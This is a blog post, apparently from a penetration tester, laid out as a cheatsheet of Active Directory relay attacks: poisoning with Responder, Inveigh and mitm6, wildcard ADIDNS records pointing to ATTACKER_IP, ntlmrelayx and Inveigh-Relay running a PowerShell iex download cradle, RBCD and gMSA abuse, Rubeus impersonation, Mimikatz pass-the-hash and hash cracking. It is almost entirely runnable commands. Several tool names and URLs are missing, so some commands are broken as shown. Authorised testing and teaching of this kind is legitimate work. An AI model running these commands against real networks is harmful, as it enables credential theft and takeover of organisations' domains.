Relay Attacks - Active Directory Penetration Testing


Here is another continuation of Active Directory Penetration Testing cheatsheet, this time - I am putting together few of the common relay attacks that we observe in pentests and red-team assessments. 

#Relay attacks - Capturing SMB hashes 

Import-Module .\Inveigh.ps1

#Start collecting hashes, we will see hashes whenever a user tries to access something non-existant via SMB
Invoke-Inveigh -ConsoleOutput Y

#cracking the hashes captured from inveigh
hashcat -m 5600 hash rockyou.txt --force -r /usr/share/hashcat/rules/d3ad0ne.rule
LLMNR Poisoning

#Start responder 
python -I ens160 -rdw
python3  -I ens160 -wFb -v --lm --disable-ess

#cracking the hashes captured from inveigh
hashcat -m 5600 hash rockyou.txt --force -r /usr/share/hashcat/rules/d3ad0ne.rule
Relay Attack using Responder 

sudo python /usr/share/responder/ -I tun0 -A 
git clone

#adding a DNS Record
sudo python3 -u 'steins.local\username' -p 'P@ssw0rd!' -a add -r 'application.steins.local' -d ATTACKER_IP SERVER_IP

#wait for the victim to access our dns record :) you will get the user's NTLv2 Hash in responder

#crack the hash with john
john --format=netntlmv2 hash --wordlist=wordlist.txt
IPV6 Relay Attack

git clone
cd mitm6
python -m pip install -r requirements.txt

#start mitm6
mitm6 -d domain.fqdn

#Start ntlmrelayx -6 -t ldaps://DC_IPAddress -wh fakewpadname.domain.fqdn -l datadump

Also Checkout this article on abusing ipv6 via 
Abusing ADIDNS and Relaying the Hashes

Import-module .\Invoke-DNSUpdate.ps1
Powershell Invoke-DNSupdate -DNSType A -DNSName test -DNSData -Verbose

Import-module .\Powermad.ps1
PowerShell New-ADIDNSNode -Node * -Tombstone -Verbose
Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose

#Capture all the users hashes
Import-module .\Inveigh.ps1
Invoke-Inveigh -ConsoleOutput Y -adidns combo
Invoke-Inveigh -ConsoleOutput Y -DNS Y

#Relaying the hashes for command execution
Import-module .\InveighRelay.ps1
invoke-inveighrelay -ConsoleOutput Y -Target -ShowHelp N -StatusOutput N -Command "powershell.exe -c iex(new-object'')"
Resource Based Constrained Delegation on MSSQL Server 

#Add a DNS Record using
Invoke-DNSUpdate -DNSType A -DNSName might -DNSData KALI_IP -Realm Steins.local

#Login to the MSSQL Server and run xpdritree on the dnsname u just created
SQLCMD -S SERVER04\RE7_MS -Q "exec master.dbo.xp_dirtree '\\might@80\a'" -U Admin -P Admin
#on your Kali box, run
msDS-AllowedToActOnBehalfOfOtherIdentity is added to object SQL_server4$ for object USER
sudo proxychains python steins.local SQL_server4$ USER

#View the privileges of the user Get-ADComputer server -Server steins.local -Properties name,msDS-AllowedToActOnBehalfOfOtherIdentity,Principalsallowedtodelegatetoaccount,msds-allowedtodelegateto,trustedtoauthfordelegation #Get TGT and gain access to the server
proxychains python3 ./ -dc-ip -spn cifs/server.steibslocal -impersonate sql_admin steins.local/sql_user:Password@123

export KRB5CCNAME=sql_admin.ccache;sudo proxychains user/steinslocal@ -k -no-pass -dc-ip -target-ip


.\Rubeus.exe s4u /user:sql_user /rc4:58a478135a93ac3bf058a5ea0e8fdb71 /domain:steins.local /msdsspn:cifs/server.steins.local /impersonateuser:sql_admin /dc:dc.steins.local /ptt

dir \\server.steins.local\c$

psexec \\server.steins.local cmd.exe
Abusing GMSA by relaying 

Import-Module .\Invoke-DNSUpdate.ps1
Invoke-DNSUpdate -DNSType A -DNSName might -DNSData Attacker_IP -Realm steins.local

#Invoke a web request from the service that is using GMSA
Invoke-WebRequest -uri "http://might.steins.local" -UseDefaultCredentials

#Start capturing the data using ntlmrelayx, if its running as administraor SAM hashes will be dumped
sudo proxychains --dump-gmsa --no-dump --no-da --no-acl --no-validate-privs -debug -t ldaps://GMSA_running_machine_IP

#incase the data is shown as Password blob, you can use below to convert it to ntlm hash
(ConvertFrom-ADManagedPasswordBlob <blob>).SecureCurrentPassword | ConvertTo-NTHash OR if the user can read GMSA Passwords, you can use to dump the hashes python3 -u 'USERNAME' -p 'P@SSW0RD!' -d 'steins.local' -l 'dc.steins.local'
Abusing PrinterBug

#find machines with unconstrained Delegation enabled
Get-ADComputer -Filter {TrustedForDelegation -ewq $True}

#Compromise and login to the machine with unconstrained Delegation enabled
Invoke-Mimikatz -Command '"sekurlsa::pth /user:USERNAME /domain:steins.local /rc4:58a478135a93ac3bf058a5e354fdb71 /run:powershell.exe"'

#Run SampleSpool.exe on the unconstrianed degelation enabled machine



proxychains python3 steins.local/guest@ KALI_IP -hashes ':31d6cfe0d16ae931b73c59d7e0c089c0'

sudo proxychains -t smb:// -smb2support
Abusing ADIDNS to Send traffic to the target 

#Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes
Import-Module ./Powermad.ps1
PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose

#assign permissions to the ADIDNS
Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose
Capturing Hashes using responder and cracking hashes 

sudo proxychains responder -I tun0 -v  

hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule --force 
Relaying using ntlmrelayx

# -wh: Server hosting WPAD file (Attacker’s IP)
# -t: Target (You cannot relay credentials to the same device that you’re spoofing)
# -i: open an interactive shell
# -l: store the collected info in a specified directory 
# -c: execute the command 
# -e: execute a binary

ntlmrelayx can automatically dump hashes, when it can access an administrator account. 
so, lookout for the hashes in the output. Also Impacket 0.9.23-dev version has issues with ntlmrelay. better use the stable version.
sudo proxychains -t smb:// -smb2support

Useful commands

sudo proxychains -t smb:// -smb2support

sudo proxychains -t  smb:// -l loot -i  -smb2support -c  "powershell.exe -c iex(new-object'')" 

#Target a specific user on a specific target
sudo proxychains -t smb://USERNAME@ -smb2support 
Using Inveigh to Capture Hashes

Import-Module .\Inveigh.ps1

#Start ADIDNS abuse
Invoke-Inveigh -ConsoleOutput Y -adidns combo  

#Use credentials for ADIDNS Abuse using Inveigh
$SecPassword = ConvertTo-SecureString 'P#SSW)RD!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('steins.LOCAL\USERNAME', $SecPassword)

Invoke-Inveigh -ConsoleOutput Y -adidns combo  -ADIDNSCredential $Cred -ADIDNSDomain 

Invoke-Inveigh -ConsoleOutput Y -adidns combo -ADIDNSDomain steins.local -ADIDNSDomainController

#Capturing Hashes on the target 
Invoke-Inveigh -ConsoleOutput Y -DNS Y 

#cracking the hashes captured from inveigh
hashcat -m 5600 hash ~/Downloads/Tools/rockyou.txt --force -r  /usr/share/hashcat/rules/d3ad0ne.rule

#if you are unable to crack a hash, use inveigh-relay to relay the hashes
invoke-inveighrelay -ConsoleOutput Y -Target -ShowHelp N -StatusOutput N -Command  "powershell.exe -c whoami"

Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.

No comments:

Post a Comment